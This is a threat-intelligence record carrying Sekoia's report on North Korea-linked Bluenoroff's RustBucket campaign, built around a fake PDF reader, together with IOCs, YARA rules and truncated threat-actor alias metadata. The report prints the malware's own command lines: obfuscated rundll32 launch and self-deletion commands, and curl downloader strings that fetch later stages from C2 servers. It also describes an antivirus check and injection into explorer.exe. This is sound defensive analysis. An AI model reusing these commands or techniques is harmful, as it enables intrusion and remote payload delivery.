{ "id": "44337c51-f95d-440c-9faa-962633f262a9", "created_at": "2026-04-06T00:17:03.643232Z", "updated_at": "2026-04-10T03:38:06.551948Z", "deleted_at": null, "sha1_hash": "f5a3423d495388aadb8cb22e1e044a2042f956db", "title": "Bluenoroff’s RustBucket campaign", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1575894, "plain_text": "Bluenoroff’s RustBucket campaign\r\nBy Sekoia TDR\r\nPublished: 2023-05-22 · Archived: 2026-04-05 19:28:10 UTC\r\nLike DPRK soldiers\r\nIn April 2023, fellow security researchers at Jamf published a report on Bluenoroff’s RustBucket, a newly\r\nobserved malware targeting macOS platform. Sekoia.io analysts further investigated Bluenoroff’s infrastructure\r\nand share their findings in this report.\r\nBluenoroff is a North Korea-nexus intrusion set, allegedly subordinated to RGB’s Bureau 121 tasked with\r\nrevenue generation since at least 2015. Since 2017, Bluenoroff was observed conducting financially-driven\r\ncampaigns targeting cryptocurrency exchanges and venture capital related entities in Europe, Asia, the U.S.\r\nand the UAE.\r\nSince the end of 2021 and through 2022, Bluenoroff continuously used the same TTPs. However, Sekoia.io\r\nanalysts observed recent modifications, as described in the report previously referenced.\r\nBluenoroff’s gone macOS\r\nSince at least December 2022, Bluenoroff was observed leveraging RustBucket, a Rust and Objective-C written\r\nmalware targeting macOS running systems. This recent Bluenoroff activity illustrates how intrusion sets turn to\r\ncross-platform language in their malware development efforts, further expanding their capabilities highly likely to\r\nbroaden their victimology. While other DPRK-nexus intrusion sets, including Lazarus, Kimsuky and more\r\nrecently Reaper were already reported targeting macOS, it is the first time Bluenoroff was observed targeting\r\nmacOS users, to the best of our knowledge.\r\nThe RustBucket infection chain consists of a macOS installer that installs a backdoored, yet functional, PDF\r\nreader. The fake PDF reader then requires opening a specific PDF file that operates as a key to trigger the\r\nmalicious activity.\r\nWhen opened in a classical PDF reader, the PDF document displays a message asking the user to open the\r\ndocument in the proper reader (i.e. the backdoored one). When opened in this reader, the PDF displays a nine\r\npages document about a venture capital company that appears to be the printout of a legit company’s website. The\r\nfake PDF reader uses a hardcoded 100-bytes XOR key to decrypt the new content of the document and the C2\r\nserver configuration.\r\nhttps://blog.sekoia.io/bluenoroffs-rustbucket-campaign/\r\nPage 1 of 13\n\nFigure 1. Key PDF document when opened in a PDF Reader\r\nWhen the proper PDF file is submitted to the fake PDF reader, it requests its C2 server encoded in the PDF file\r\nusing an HTTP POST request to download and execute a new payload. The new payload is the backdoor\r\ncomponent of the RustBucket kill chain, collecting information about the compromised system, sending it to its\r\nC2 server and requesting for commands.\r\nThis new technique is interesting as it makes it more complex to track. We need to find the fake readers and the\r\nright PDF file to get relevant results from sandboxes. While the usage of a modified PDF reader was already\r\nobserved during Lazarus’ DreamJob campaign in 2020, it is the first time we observe it to target macOS. Sekoia.io\r\nanalysts created YARA rules and collected new samples complementing Jam’s findings, available in the IOCs\r\nsection.\r\nLooking through the Window(s) pane\r\nDuring our investigation on the macOS variant, Sekoia.io analysts identified a .NET version of RustBucket, with\r\na similar GUI, developed using the library DevExpress.XtraPdfViewer. The malware was embedded in a ZIP\r\narchive containing the PDF reader and the “key” PDF requiring user interaction.\r\nFigure 2. Windows RustBucket archive’s content\r\nhttps://blog.sekoia.io/bluenoroffs-rustbucket-campaign/\r\nPage 2 of 13\n\nSimilarly to the RustBucket macOS version, when the user opens the PDF file in another PDF reader, it opens a\r\none-pager with a message stating the file is protected and must be opened with the “internal” reader. When the file\r\nis opened with the fake PDF reader, it prints a sixteen pages document containing a list of contacts.\r\nFigure 3. (left) Key PDF document opened in Firefox, (right) Key PDF document opened in the Internal\r\nPDF viewer\r\nDuring our analysis, we observed that both Windows and MacOS RustBucket’s versions use the same\r\ndecryption key. The executable PdfViewer.exe decrypts the malicious PDF and calls the Create function of the\r\nDevExpress.Xpo.v19.2.dll Library with the C2 url as parameter (if a legitimate PDF is chosen, an error is returned\r\n”Can’t decrypt PDF file”). Then two other DLLs are also used to load the backdoor, as detailed here above and in\r\nFigure 4.\r\nPdfViewer/DevExpress.Xpo.v19.2.dll\r\nThe purpose of this DLL is to retrieve the process ID of an explorer.exe process. Then, the function Create of the\r\nDevExpress.XtraList.v19.2.dll library is called with the URL and the process ID as parameters.\r\nPdfViewer/DevExpress.XtraList.v19.2.dll\r\nThe purpose of this DLL is to load and call the DevExpress.Xpr.v19.2.dll library. This DLL checks for some\r\nantivirus on the infected machine: Bitdefender, Kaspersky, Sophos, AvastSvc, Norton, Avira, AVG and\r\nWindowsDefender. If one of this antivirus is found, the DLL call the OpenProcess API to run the following\r\ncommand:\r\nrundll32.exe %s\\DevExpress.Xpr.v19.2.dll,Update\r\nIf there is no antivirus, the DLL perform code injection on the provided explorer.exe process. The injected payload\r\nstarts by decrypted itself into the DevExpress.Xpr.v19.2.dll.\r\nDevExpress.Xpr.v19.2.dll\r\nhttps://blog.sekoia.io/bluenoroffs-rustbucket-campaign/\r\nPage 3 of 13\n\nThis DLL is called via the Update function which gives back the execution flow to the DLLMain function with\r\n0xD8E1 as reason code (instead of 0, 1, 2 or 3). Then a new thread is created. This backdoor collects information\r\nabout the compromised machine (name, active processes, network configuration, etc.) and sends this information\r\nto the C2 using POST requests. It also has the capability to load a next stage (we assess that this next stage is\r\nprovided by the C2).\r\nThe backdoor collects information about the compromised machine and the active processes and sends this\r\ninformation to the C2 using POST requests.\r\nFigure 4. Windows RustBucket execution flow chart\r\nPivoting on the infrastructure\r\nPivoting on the infrastructure used to deliver RustBucket, Sekoia.io analysts retrieved additional infrastructure\r\nnot exclusively related to the RustBucket activity that we associate to Bluenoroff with high confidence, used\r\nto deploy other malware through several infection chains. These infection chains notably include LNK, MSI,\r\nhttps://blog.sekoia.io/bluenoroffs-rustbucket-campaign/\r\nPage 4 of 13\n\nOneNote and VHD files. It is possible Bluenoroff is testing new infection chains and malware before shifting\r\nor expanding their TTPs.\r\nBluenoroff’s observed initial intrusion vector includes phishing emails, as well as leveraging social networks such\r\nas LinkedIn. During our investigations, we identified the domain sarahbeery.docsend[.]me, further analysis led us\r\nto the following LinkedIn profile:\r\nFigure 5. LinkedIn profile allegedly used by Bluenoroff\r\nAs of the time of writing, TDR analysts could no longer find this profile on LinkedIn. We assess this likely was a\r\nprofile used by Bluenoroff after it was leaked to engage with their targets, possibly followed up by a delivery\r\nof malicious documents through the docsend sharing platform.\r\nWhile Bluenoroff was seen leveraging updated VHD and CAB files to bypass the Mark-of-the-Web (MOTW) flag\r\nuntil the end of 2022, Sekoia.io did not observe these TTPs in 2023. It is almost certainly a reflection of\r\nBluenoroff’s adaptation efforts after their TTPs were documented in open source, notably by Securelist. In\r\nMarch 2023, we observed new files (MSI file: 5c483473641807082e530744023044fd and One Note file:\r\n4e05597d308d2368625dc19e86a9ca22) containing similar commands to those used in the VHD files reported by\r\nKaspersky.\r\nThose files were used to drop and execute 529c65521e8a07c8810b6d225f7e2a89 which is a downloader for a\r\ncurl-agent that Sekoia.io analysts did not retrieve at the time of writing.\r\ncmd.exe /c copy /b %s\\system32\\rund^ll3^2.e^xe %s\\rdl.e^xe \u0026 %s\\rdl.ex^e %s #1 %S\r\ncmd /c timeout /t 10 \u0026 Del /f /q “%s” \u0026 attrib -s -h “%s” \u0026 rundll32 “%s” #1 %S\r\ncmd /c timeout /t 10 \u0026 rundll32 “%s” #1 %S\r\ncurl -A cur1-agent -L %s -s -d dacurl -A cur1-agent -L %s -s -d dl\r\nAs per Sekoia.io analysts’ observations, the network infrastructure is used to host HTTP/HTTPS services\r\nleveraged by lure files. This infrastructure is used to download a later stage malware which often is a VBS acting\r\nas a backdoor, or a curl-agent downloader. During their investigation, Sekoia.io analysts created automatic\r\ntrackers to monitor Bluenoroff’s infrastructure evolution. In previous activities, the intrusion set setup\r\nHTTP/HTTPS servers with specific characteristics used to host a dozen domains notably typosquatting IT,\r\nfinancial and investment companies.\r\nBased on a TDR heuristic, we identified servers used to host domain typo-squatting legitimate organisations,\r\nnotably pertaining to entities involved in fund management and venture fund, crypto assets and blockchain,\r\nlocated in Europe, Asia, and North America.\r\nhttps://blog.sekoia.io/bluenoroffs-rustbucket-campaign/\r\nPage 5 of 13\n\nFigure 6. Financial and technology entities typo-squatted by Bluenoroff\r\nBased on previous open source publications and our own knowledge of this intrusion set, we associate these\r\ndomains to Bluenoroff with high confidence. A list of retrieved typosquatting domains is available to Sekoia.io’s\r\ncustomers in the Intelligence Center.\r\nWhether Bluenoroff’s attempt to target these entities or simply masqueraded as those entities to target other\r\nindividuals and / or organizations remains an intelligence gap at the time of writing. Regardless, Sekoia.io TDR\r\nanalysts assess this is in line with past Bluenoroff’s activities, targeting finance-related institutions. Based on\r\ntyposquatting domains and Sekoia.io attributed levels of confidence, we identified a strong focus on Asia and the\r\nU.S.. While this almost certainly stems from the fact that these regions are particularly active in the Fintech area,\r\nit is also likely part of Bluenoroff’s geographical targeting assignment. We also retrieved domains indicating a\r\ntargeting of Laos and Thailand.\r\nhttps://blog.sekoia.io/bluenoroffs-rustbucket-campaign/\r\nPage 6 of 13\n\nFigure 7. Bluenoroff targets since September 2022\r\nOf note, we also observed that the group may use temporary C2 servers, when testing new techniques, that\r\nthey then discard rapidly. For instance, in November 2022, Bluenoroff temporarily used a server to transition to\r\nusing MSI and CAB files (149.28.247[.]34). Similarly, the intrusion set sporadically used a specific server when\r\nexperimenting with chm (Windows Helper) files (172.86.122[.]181) in December 2022.\r\nConclusion\r\nSekoia.io analysts assess this activity is part of Bluenoroff’s SnatchCrypto campaign, active since 2017. It is in\r\nline with past observed malicious cyber activities, notably pertaining to Pyongyang’ strategic objective of revenue\r\ngeneration to evade sanctions. Of particular interest are Bluenoroff’s observed efforts to develop their offensive\r\ncapabilities, notably including crossplatform languages to their toolset, and expanding their victimology\r\nthrough the targeting of multiple environments. Sekoia.io analysts assess Bluenoroff’s activities will almost\r\ncertainly continue in the short to medium term.\r\nIoCs \u0026 Technical Details\r\nSamples’ first seen date relates to the time they were first submitted to VirusTotal. Of note, a few samples we\r\nidentified were tagged as NukeSped in open source, likely due to the confusion between Lazarus and Bluenoroff\r\nactivities. At the time of writing, Sekoia.io analysts consider NukeSped to be a Lazarus signature malware. IOCs\r\nprovided in Appendix are all associated to Bluenoroff with high confidence.\r\nRustBucket MacOS version\r\n2023-05-08\r\nJump Crypto Investment Agreement.zip\r\nhttps://blog.sekoia.io/bluenoroffs-rustbucket-campaign/\r\nPage 7 of 13\n\nba5e982596fd03bea98f5de96c1258e56327358e134ceecd1d68e54480533d92\r\nInternal PDF Viewer.app.zip\r\n3ed9f34fedca38130776e5adabae363ac797fe89087e04e0c93d83fd62a7a9a4\r\nZIP\r\n6ca3a2f4cef27dac9d28c1ec2b29a8fa09dfc6dbbaf58e00dddbf5c1dd3b3cc3\r\nMach-O - Internal PDF Viewer\r\nc28e4031129f3e6e5c6fbd7b1cebd8dd21b6f87a8564b0fb9ee741a9b8bc0197\r\nMach-O\r\ne2f177b8806923f21a93952b61aedbeb02d829a67a820a7aab5ee72512e3d646\r\nMach-O\r\nd6d367453c513445313be7339666e4faeeebeae71620c187012ea5ae2901df34\r\nPDF - Jump Crypto Investment Agreement.pdf (Key PDF)\r\n5f00106f7f15e0ca00df4dbb0eeccd57930b4b81bc9aa3fca0c5af4eda339ab7\r\nPDF - Readme.pdf (Instruction to use the fake reader)\r\nebad7317e1b01c2231bdbf37dfebdf656e3c8706e719fd37b66f0170b3d5cae0\r\n2023-05-02\r\nZIP Internal PDF Viewer.app.zip\r\ndda8a9e2a2e415be781a39fdf41f1551af2344f1b1a0ddf921d8aeba90343d1b\r\nMach-O Internal PDF Viewer\r\n46db9f2fc879bf643a8f05e2b35879b235cbb04aa06fe548f0bc7c7c02483cf3\r\nMach-O\r\n5072b28399c874f92e71793fa13207d946a28a2f5903365ac11ddf666d15d086\r\nMach-O\r\n3f0d5ddca2657044f4763ae53c4f33c8a7814ba451b60d24430a126674125624\r\n2023-04-23\r\nZIP - Internal PDF Viewer 2.app.zip\r\n61772375af1884fe73c5d154b8637dd62f26d23bc38d18462a88e2bbed483fd7\r\nSCPT - main.scpt\r\n7c66d2d75be43d2c17e75d37c39344a9b5d29ee5c5861f178aa7d9f34208eb48\r\ncloud.dnx[.]capital\r\n104.255.172[.]56\r\nZIP - Internal PDF Viewer.zip\r\nff8832355ae99ffd66d0fe9eda2d74efdf3ed87bb2a4c215b93ade93165f7c0b\r\nZIP - Internal PDF Viewer.app.zip\r\n83f457bc81514ec5e3ea123fc237811a36da6ce7f975ad56d62e34af4d1f37c0\r\nZIP - Internal PDF Viewer 3.app.zip\r\nb68bf400a23b1053f54911a2b826d341f6bf87c26bea5e6cf21710ee569a7aab\r\nMach-O - PdfWriter\r\n3b6f30369a4ee8bf9409d141b6d1b3fb4286c34984b5de005ed7431df549b17e\r\nlaos.hedgehogvc[.]us\r\n104.255.172[.]56\r\n2023-04-21\r\nMach-O - 703517604263\r\n9ca914b1cfa8c0ba021b9e00bda71f36cad132f27cf16bda6d937badee66c747\r\nMach-O\r\nec8f97d5595d92ec678ffbf5ae1f60ce90e620088927f751c76935c46aa7dc41\r\nMach-O\r\nhttps://blog.sekoia.io/bluenoroffs-rustbucket-campaign/\r\nPage 8 of 13\n\n7fccc871c889a4f4c13a977fdd5f062d6de23c3ffd27e72661c986fae6370387\r\n2023-03-02\r\nZIP - Internal PDF Viewer.app.zip\r\nb448381f244dc0072abd4f52e01ca93efaebb2c0a8ea8901c4725ecb1b2b0656\r\nZIP - Pdf Viewer.zip\r\nc56a97efd6d3470e14193ac9e194fa46d495e3dddc918219cca530b90f01d11e\r\nMach-O - Internal PDF Viewer\r\nbea33fb3205319868784c028418411ee796d6ee3dfe9309f143e7e8106116a49\r\n2023-02-13 (creation date 2022-12-20)\r\nZIP - Pdf Viewer.zip\r\n0d6964fe763c2e6404cde68af2c5f86d34cf50a88bd81bc06bba739010821db0\r\nZIP - Internal PDF Viewer.app.zip\r\nea5fac3201a09c3c5c3701723ea9a5fec8bbc4f1f236463d651303f40a245452\r\nZIP - Internal PDF Viewer.app.zip\r\n9525f5081a5a7ab7d35cf2fb2d7524e0777e37fe3df62730e1e7de50506850f7\r\nMach-O - Internal PDF Viewer\r\ne74e8cdf887ae2de25590c55cb52dad66f0135ad4a1df224155f772554ea970c\r\nMach-O\r\n38106b043ede31a66596299f17254d3f23cbe1f983674bf9ead5006e0f0bf880\r\nMach-O\r\n7981ebf35b5eff8be2f3849c8f3085b9cec10d9759ff4d3afd46990520de0407\r\nWindows version of RustBucket\r\nZIP - PdfViewer.zip\r\n62a5c6a600051bca4f7b3d11508ca1f968006b71089c71bf87b83ea8b34188e3\r\nPDF - DOJ Report on Bizlato Investigation.pdf\r\n8e234482db790fa0a3d2bf5f7084ec4cfb74bffd5f6cbdc5abdbc1350f58e3fe\r\nDLL - DevExpress.Xpr.v19.2.dll\r\nf603713bffb9e040bedfd0bb675ff5a6b3205d8bd4e1a3309ea6d1b608871184\r\nDLL - DevExpress.XtraList.v19.2.dll\r\n31cec2803bfc7750930d5864400388732a822da96c3f79c98ddee03949aa6a2d\r\nEXE - PdfViewer.exe\r\nb3cb7d0b656e8e4852def8548d2cf1edc4e64116434e1f2d9c9b150ee0f9861e\r\nsafe.doc-share[.]cloud\r\n172.93.181[.]221\r\nKey PDF file 2\r\nPDF - DOJ Report on Bizlato Investigation_asistant.pdf\r\n07d206664a8d397273e69ce37ef7cf933c22e93b62d95b673d6e835876feba06\r\nsafe.doc-share[.]cloud\r\nIP and domains\r\nActive Bluenoroff C2 servers\r\nhttps://blog.sekoia.io/bluenoroffs-rustbucket-campaign/\r\nPage 9 of 13\n\n104.156.149[.]130 (2023-04-18 - today)\r\n104.255.172.52 (2023-03-18 - today)\r\n104.234.147[.]28 (2023-01-21 - today)\r\n104.168.138.7 (2023-03-17 - today)\r\n104.168.167[.]88 (2022-10-17 - today)\r\n155.138.159.45 (2022-09-20 - today)\r\nInactive servers\r\n104.255.172[.]56 (2022-09-15 - 2023-04-11)\r\n172.93.181[.]221 (2022-12-28 - 2023-03-06)\r\n172.86.121[.]143 (2022-10-31 - 2022-12-21)\r\n172.86.121[.]130 (2022-10-25 - 2023-01-24)\r\n149.28.247[.]34 (2022-11-11 - 2022-11-11)\r\n152.89.247[.]87 (2022-09-15 - 2022-10-24)\r\n104.168.174[.]80 (2022-06-28 - 2022-09-16)\r\n149.248.52[.]31 (2022-08-05 - 2022-08-31)\r\n155.138.219[.]140 (2022-07-17 - 2022-08-16)\r\nYARA rules\r\nrule apt_Bluenoroff_downloader_mac_RustBucket {\r\n meta:\r\n id =\"5a003b68-ad9a-47f9-b157-dd898181dac2\"\r\n version = \"1.0\"\r\n malware = \"RustBucket\"\r\n description = \"RustBucket fake PDF reader\"\r\n source = \"SEKOIA\"\r\n creation_date = \"2023-04-24\"\r\n classification = \"TLP:WHITE\"\r\n reference = \"https://tinyurl.com/5n7f56a8\"\r\n hash = \"606bce13161693844b9eb36c96554883\"\r\n hash = \"b93d7b7b30207249c1c683df16bad107\"\r\n hash = \"ca86579220eecfaede268d1520d07fae\"\r\n hash = \"f8800dd176487601ccf2e27c094b297b\"\r\n strings:\r\n $down_exec1 = \"_down_update_run\" nocase\r\n $down_exec2 = \"downAndExec\" nocase\r\n $encrypt1 = \"_encrypt_pdf\"\r\n $encrypt2 = \"_encrypt_data\"\r\n $error_msg1 = \"_alertErr\"\r\n $error_msg2 = \"_show_error_msg\"\r\n $view_pdf1 = \"-[PEPWindow view_pdf:]\"\r\n $view_pdf2 = \"-[PEPWindow viewPDF:]\"\r\n condition:\r\nhttps://blog.sekoia.io/bluenoroffs-rustbucket-campaign/\r\nPage 10 of 13\n\n(uint32be(0) == 0xcafebabe or uint32be(0) == 0xcffaedfe)\r\n and 5 of them\r\n and filesize \u003e 50KB\r\n}\r\nrule apt_Bluenoroff_implant_mac_RustBucket: TESTING {\r\n meta:\r\n id = \"fcbb745d-7f56-4c51-9db5-427da22a0c68\"\r\n version = \"1.0\"\r\n malware = \"RustBucket\"\r\n description = \"Detect the RustBucket malware\"\r\n source = \"SEKOIA\"\r\n creation_date = \"2023-04-24\"\r\n classification = \"TLP:WHITE\"\r\n hash = \"f90b544f89cfbe38aee18024d7c39e40\"\r\n reference = \"https://tinyurl.com/5n7f56a8\"\r\n strings:\r\n $ = \"/Users/hero/\"\r\n $ = \"PATHIpv6Ipv4Bodyslotpath\"\r\n condition:\r\n (uint32be(0) == 0xcafebabe or uint32be(0) == 0xcffaedfe) and all of them\r\n}\r\nrule apt_Bluenoroff_downloader_win_curl_agent: TESTING {\r\n meta:\r\n id = \"ddeb2d8f-1b10-4a33-b768-d19412e8551a\"\r\n version = \"1.0\"\r\n intrusion_set = \"Bluenoroff\"\r\n description = \"Detect the downloader used by Bluenoroff to install it CurlAgent\"\r\n source = \"SEKOIA\"\r\n creation_date = \"2023-05-02\"\r\n classification = \"TLP:WHITE\"\r\n strings:\r\n $ = \"%s\\\\marcoor.dll\" wide\r\n $ = \"curl -A cur1-agent -L %s -s -d dl\"\r\n $ = \"curl -A cur1-agent -L %s -s -d da\"\r\n $ = \"cmd /c timeout /t 10 \u0026 rundll32 \\\"%s\\\" #1\" wide\r\n $ = \"cmd /c timeout /t 10 \u0026 Del /f /q \\\"%s\\\" \u0026 attrib -s -h \\\"%s\\\" \u0026 rundll32 \\\"%s\\\" #1\" wid\r\n condition:\r\n 3 of them\r\n}\r\nAppendix 1. Bluenoroff’s infection chain.\r\nThe classical infection chain observed is ZIP \u003e LNK \u0026 PDF\r\nhttps://blog.sekoia.io/bluenoroffs-rustbucket-campaign/\r\nPage 11 of 13\n\nAs part of their phishing activities, Bluenoroff’s operators send their targets a ZIP archive. The archive contains a\r\nnon-malicious PDF document and a LNK file masquerading as a TXT file purportedly containing a password to\r\nread the PDF, or masquerading as a PDF reader. Launching the LNK file results in downloading a Javascript file\r\nfrom Bluenoroff-controlled C2 server and executing it using mshta.exe. The downloaded file is an obfuscated\r\nJavascript:\r\n5ca7c871dfe24b27b5cf7e9bf087f44c7620d78a1d4fa76373f22abedbdf8f82\r\nThe obfuscation method is straightforward and consists in encoding some characters in UTF-8 and Hex. This\r\nscript decodes its base64 block, writes it in a file ”tyrbz.js” and runs it with a command line containing the C2\r\ndomain as argument. The base64 encoded part is a script dropped on the computer and executed with the C2\r\ndomain as argument. The script requests the domain using an HTTP POST request, decodes the base64 encoded\r\nresponse and executes it using ‘eval()‘. The script attempts to contact the C2 server every 15 seconds and acts as a\r\nbackdoor, allowing the attacker to send commands and scripts to be executed. While we identified a few changes\r\nin 2023, this infection chain remains the most frequently observed.\r\nChat with our team!\r\nWould you like to know more about our solutions?\r\nDo you want to discover our XDR and CTI products?\r\nDo you have a cybersecurity project in your organization?\r\nMake an appointment and meet us!\r\nThank you for reading this blogpost. Feel free to share your feedback, and read other TDR reports here :\r\nAPT Bluenoroff CTI North Korea\r\nTDR is the Sekoia Threat Detection \u0026 Research team. Created in 2020, TDR provides exclusive Threat\r\nIntelligence, including fresh and contextualised IOCs and threat reports for the Sekoia SOC Platform TDR is also\r\nresponsible for producing detection materials through a built-in Sigma, Sigma Correlation and Anomaly rules\r\ncatalogue. TDR is a team of multidisciplinary and passionate cybersecurity experts, including security researchers,\r\ndetection engineers, reverse engineers, and technical and strategic threat intelligence analysts. Threat Intelligence\r\nanalysts and researchers are looking at state-sponsored \u0026 cybercrime threats from a strategic to a technical\r\nperspective to track, hunt and detect adversaries. Detection engineers focus on creating and maintaining high-quality detection rules to detect the TTPs most widely exploited by adversaries. TDR experts regularly share their\r\nanalysis and discoveries with the community through our research blog, GitHub repository or X / Twitter account.\r\nYou may also come across some of our analysts and experts at international conferences (such as BotConf, Virus\r\nBulletin, CoRIIN and many others), where they present the results of their research work and investigations.\r\nShare this post:\r\nhttps://blog.sekoia.io/bluenoroffs-rustbucket-campaign/\r\nPage 12 of 13\n\nSource: https://blog.sekoia.io/bluenoroffs-rustbucket-campaign/\r\nhttps://blog.sekoia.io/bluenoroffs-rustbucket-campaign/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://blog.sekoia.io/bluenoroffs-rustbucket-campaign/" ], "report_names": [ "bluenoroffs-rustbucket-campaign" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0", "created_at": "2022-10-25T15:50:23.240383Z", "updated_at": "2026-04-10T02:00:05.299433Z", "deleted_at": null, "main_name": "APT38", "aliases": [ "APT38", "NICKEL GLADSTONE", "BeagleBoyz", "Bluenoroff", "Stardust Chollima", "Sapphire Sleet", "COPERNICIUM" ], "source_name": "MITRE:APT38", "tools": [ "ECCENTRICBANDWAGON", "HOPLIGHT", "Mimikatz", "KillDisk", "DarkComet" ], "source_id": "MITRE", "reports": null }, { "id": "1bdb91cf-f1a6-4bed-8cfa-c7ea1b635ebd", "created_at": "2022-10-25T16:07:23.766784Z", "updated_at": "2026-04-10T02:00:04.7432Z", "deleted_at": null, "main_name": "Bluenoroff", "aliases": [ "APT 38", "ATK 117", "Alluring Pisces", "Black Alicanto", "Bluenoroff", "CTG-6459", "Copernicium", "G0082", "Nickel Gladstone", "Sapphire Sleet", "Selective Pisces", "Stardust Chollima", "T-APT-15", "TA444", "TAG-71", "TEMP.Hermit" ], "source_name": "ETDA:Bluenoroff", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null }, { "id": "9b02c527-5077-489e-9a80-5d88947fddab", "created_at": "2022-10-25T16:07:24.103499Z", "updated_at": "2026-04-10T02:00:04.867181Z", "deleted_at": null, "main_name": "Reaper", "aliases": [ 